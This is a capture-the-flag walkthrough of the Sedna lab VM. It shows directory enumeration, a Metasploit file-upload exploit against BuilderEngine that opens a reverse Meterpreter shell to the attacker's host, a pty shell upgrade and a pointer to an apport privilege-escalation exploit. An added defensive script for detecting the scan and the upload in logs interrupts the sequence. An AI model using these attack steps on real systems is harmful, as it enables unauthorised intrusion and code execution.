Credits to Viper for contributing this fantastic VM. If you are interested, you can d/l it here.
1. Start with a port scan and experiment with the nmap flags. Watch for port knocking: some hosts only reveal their services after you hit ports in a specific sequence.
2. Rule of thumb: if you see a web port, enumerate it, because that is where you are most likely to find useful material. It is also easier to enumerate than other services, since we all browse the web and the interaction is natural. Always go for the low-hanging fruit.
dirb http://192.168.0.113/ -w -o dirb.txt

-----------------
DIRB v2.22
By The Dark Raver
-----------------

OUTPUT_FILE: dirb.txt
START_TIME: Wed Jun 14 11:30:51 2017
URL_BASE: http://192.168.0.113/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
OPTION: Not Stoping on warning messages

-----------------

GENERATED WORDS: 4614

---- Scanning URL: http://192.168.0.113/ ----
==> DIRECTORY: http://192.168.0.113/blocks/
==> DIRECTORY: http://192.168.0.113/files/
+ http://192.168.0.113/index.html (CODE:200|SIZE:101)
==> DIRECTORY: http://192.168.0.113/modules/
+ http://192.168.0.113/robots.txt (CODE:200|SIZE:36)
+ http://192.168.0.113/server-status (CODE:403|SIZE:293)
==> DIRECTORY: http://192.168.0.113/system/
==> DIRECTORY: http://192.168.0.113/themes/
<--snip--snip-->
3. Found BuilderEngine at http://192.168.0.113/modules/builder_market/license.txt
4. I found 2 exploits on exploit-db.com, took the easy way and used the msf module :-). You can d/l it here.
msf exploit(42025) > info

       Name: BuilderEngine Arbitrary File Upload Vulnerability and execution
     Module: exploit/linux/misc/42025
   Platform: PHP
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2016-09-18

Provided by:
  metanubix
  Marco Rivoli

Available targets:
  Id  Name
  --  ----
  0   BuilderEngine 3.5.0

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOST      192.168.0.113    yes       The target address
  RPORT      80               yes       The target port (TCP)
  SSL        false            no        Negotiate SSL/TLS for outgoing connections
  TARGETURI  /                yes       The base path to BuilderEngine
  VHOST                       no        HTTP server virtual host

Payload information:
  Avoid: 1 characters

Description:
  This module exploits a vulnerability found in BuilderEngine 3.5.0 via
  elFinder 2.0. The jquery-file-upload plugin can be abused to upload a
  malicious file, which would result in arbitrary remote code execution
  under the context of the web server.

References:
  https://www.exploit-db.com/exploits/40390

msf exploit(42025) > run

[*] Started reverse TCP handler on 192.168.0.182:4444
[+] Our payload is at: OccVNRFDJjYA.php. Calling payload...
[*] Calling payload...
[*] Sending stage (33986 bytes) to 192.168.0.113
[*] Meterpreter session 1 opened (192.168.0.182:4444 -> 192.168.0.113:51443) at 2017-06-14 12:14:42 +0800
[+] Deleted OccVNRFDJjYA.php
id
meterpreter > shell
Process 12629 created.
Channel 0 created.
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
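From the defender's side, the two web-facing steps above leave a recognisable trail in the Apache access log: the dirb run in step 2 shows up as a burst of 404s from one client, and the upload exploit in step 4 as a POST to the upload endpoint followed by a request for a freshly created .php file under the upload directory that the server answers with 200. The script below is an added example written for this walkthrough, not code from the original post, from BuilderEngine or from the Metasploit module; it parses constructed sample log lines and flags both patterns. The upload endpoint and directory paths are placeholders rather than BuilderEngine's real paths; the attacking address and the payload file name are the ones that appear in the msf output above.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Apache common/combined log format; only the fields the detections need are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

# Constructed placeholders: the real BuilderEngine/jquery-file-upload paths differ.
UPLOAD_ENDPOINT = "/example-upload-plugin/server/php/"
UPLOAD_DIR = UPLOAD_ENDPOINT + "files/"


def parse_log(text):
    """Parse access-log text into dicts (ip, ts, method, path, status); skip non-matching lines."""
    entries = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        d = m.groupdict()
        d["ts"] = datetime.strptime(d["ts"], TS_FMT)
        d["status"] = int(d["status"])
        entries.append(d)
    return entries


def detect_dir_bruteforce(entries, threshold=20, window=timedelta(seconds=60)):
    """Return the set of client IPs that produced at least `threshold` 404s inside any
    sliding `window`; a wordlist scan such as dirb trips this almost immediately."""
    recent = defaultdict(deque)
    flagged = set()
    for e in sorted(entries, key=lambda e: e["ts"]):
        if e["status"] != 404:
            continue
        q = recent[e["ip"]]
        q.append(e["ts"])
        while q and e["ts"] - q[0] > window:
            q.popleft()
        if len(q) >= threshold:
            flagged.add(e["ip"])
    return flagged


def detect_upload_then_exec(entries, upload_endpoint, upload_dir,
                            exts=(".php", ".phtml", ".phar")):
    """Return (ip, path) pairs where a client POSTed to the upload endpoint and later
    fetched a script-extension file under the upload directory with HTTP 200, i.e. an
    uploaded file that the web server executed instead of serving as data."""
    uploaders = set()
    findings = []
    for e in sorted(entries, key=lambda e: e["ts"]):
        if e["method"] == "POST" and e["path"].startswith(upload_endpoint) and e["status"] == 200:
            uploaders.add(e["ip"])
        elif (e["ip"] in uploaders and e["status"] == 200
              and e["path"].startswith(upload_dir)
              and e["path"].split("?", 1)[0].lower().endswith(exts)):
            findings.append((e["ip"], e["path"]))
    return findings


def _line(ip, ts, method, path, status, size=293):
    return f'{ip} - - [{ts.strftime(TS_FMT)}] "{method} {path} HTTP/1.1" {status} {size}'


def build_sample_log():
    """Constructed sample log: a 25-request wordlist burst, one benign visitor, then the
    upload and the fetch of the dropped file. Timestamps mirror the walkthrough's clock."""
    t0 = datetime.strptime("14/Jun/2017:11:30:51 +0800", TS_FMT)
    scanner = "192.168.0.182"  # attacking host seen in the msf output above
    lines = []
    for i, word in enumerate(["admin", "backup", "cgi-bin", "config", "test"] * 5):
        lines.append(_line(scanner, t0 + timedelta(seconds=i), "GET", f"/{word}{i}", 404))
    lines.append(_line("192.168.0.50", t0 + timedelta(seconds=3), "GET", "/index.html", 200, 101))
    t1 = t0 + timedelta(minutes=44)
    lines.append(_line(scanner, t1, "POST", UPLOAD_ENDPOINT, 200, 512))
    lines.append(_line(scanner, t1 + timedelta(seconds=2), "GET",
                       UPLOAD_DIR + "OccVNRFDJjYA.php", 200, 0))
    return "\n".join(lines)


if __name__ == "__main__":
    log = parse_log(build_sample_log())
    print("directory brute force from:", detect_dir_bruteforce(log))
    print("uploaded script executed:", detect_upload_then_exec(log, UPLOAD_ENDPOINT, UPLOAD_DIR))
```

Both checks are deliberately simple so they can be read as rules: the first is a rate threshold on 404s per client, the second is a two-event sequence keyed on client IP. In practice you would feed `parse_log` the real access log and set `UPLOAD_ENDPOINT` / `UPLOAD_DIR` to the application's actual upload handler and storage path; the same sequence check also makes the mitigation obvious, since a storage directory that the web server is not allowed to execute scripts from turns the second event into a plain file download.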
$ python -c 'import pty; pty.spawn("/bin/bash")'
python -c 'import pty; pty.spawn("/bin/bash")'
www-data@Sedna:/tmp$
5. Now for the privilege escalation part, I've been trying various overlayfs exploits but none seem to work because /bin/su was removed. After some googling for Ubuntu 14.04 local priv exploits, I found the apport package to be vulnerable. You can d/l it here.